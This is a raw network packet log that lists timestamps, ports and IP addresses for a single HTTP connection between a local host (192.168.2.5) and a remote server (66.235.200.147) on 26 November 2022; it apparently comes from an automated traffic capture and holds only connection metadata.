Nov 26, 2022 11:17:42.518011093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518035889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518037081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518053055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518054962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518079996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518081903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518105030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518111944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518130064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518137932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518151999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518153906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518177986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518178940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518196106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518203974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518229961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518249035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518255949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518265963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518280029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518280983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518299103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518305063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518330097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518331051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518354893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518359900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518376112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518379927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518405914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518416882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518433094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518433094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518445969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518459082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518481970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518484116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518511057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518522978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518522978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518534899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518559933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518563032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518577099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518584967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518610954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518632889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518635988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518662930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518667936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518686056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518687963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518707991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518713951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518731117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518739939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518759012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518764973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518785954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518800020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518821955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518822908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518845081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518852949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518867016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518868923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518903971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518906116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518922091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518929005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518949986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518955946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.518971920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518996954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519009113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519017935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519040108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519041061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519042015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519062996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519067049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519082069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519087076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519109964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519124031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519140005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519161940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519184113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519191980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519206047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519206047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519228935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519228935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519253016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519268990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519273996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519284010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519295931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519295931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519318104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519325972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519340038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519346952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519360065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519361019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519383907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519387960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519406080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519407988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519428015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519432068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519449949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519450903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519474030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519484997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519495010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519499063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519514084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519515991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519537926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519547939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519558907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519565105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519577980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519579887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519603968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519624949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519639015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519639015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519648075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519669056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519673109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519673109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519691944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519707918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519761086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519764900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519788027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519810915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519833088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519845963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519846916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519855976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519864082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519876003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519877911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519901991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519910097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519926071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519927025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519946098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519956112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519968987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.519970894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.519992113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520014048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520015001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520025015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520036936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520036936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520060062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520080090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520090103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520103931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520108938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520121098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520143032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520164967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520172119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520172119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520205021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520217896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520219088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520219088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520226955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520250082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520272017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520292044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520292997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520309925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520323038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520330906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520349026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520354033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520369053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520376921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520397902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520401001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520417929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520431995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520441055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520452023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520457983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520479918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520488024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520502090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520513058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520523071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520545006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520546913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520560980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520565987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520582914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520587921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520596027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520607948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520611048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520638943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520652056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520697117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520718098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520740986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520749092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520759106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520761967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520781994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520785093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520806074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520807028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520828009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520832062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520848989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520860910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520879984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520886898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520898104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520908117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520931005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520967960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520967960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.520970106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.520986080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521017075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521023035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521044016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521064997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521085024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521104097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521111012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521126032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521148920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521169901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521169901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521169901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521184921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521192074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521214008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521215916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521234035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521235943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521258116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521258116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521279097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521285057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521298885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521300077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521322012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521323919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521337032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521343946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521364927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521370888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521385908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521408081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521430969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521452904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521473885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521497965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521518946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521534920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521534920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521534920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521534920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521534920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521539927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521564007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521580935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521580935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521584034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521604061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521605968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521626949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521630049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521647930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521677971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521692991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521692991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521698952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521714926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521730900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521745920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521761894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521807909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521830082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521905899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521928072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521950006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521971941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.521986008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521986008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.521995068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522017956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522027016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522027016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522041082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522042990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522062063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522083998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522085905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522105932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522109985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522126913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522134066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522149086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522170067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522171974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522192955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522195101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522217035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522217989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522238970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522238970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522260904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522265911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522279978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522283077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522305012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522305012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522325993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522327900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522351027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522361994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522371054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522376060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522386074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522392988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522418022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522422075 CET	49707	80	192.168.2.5	66.235.200.147
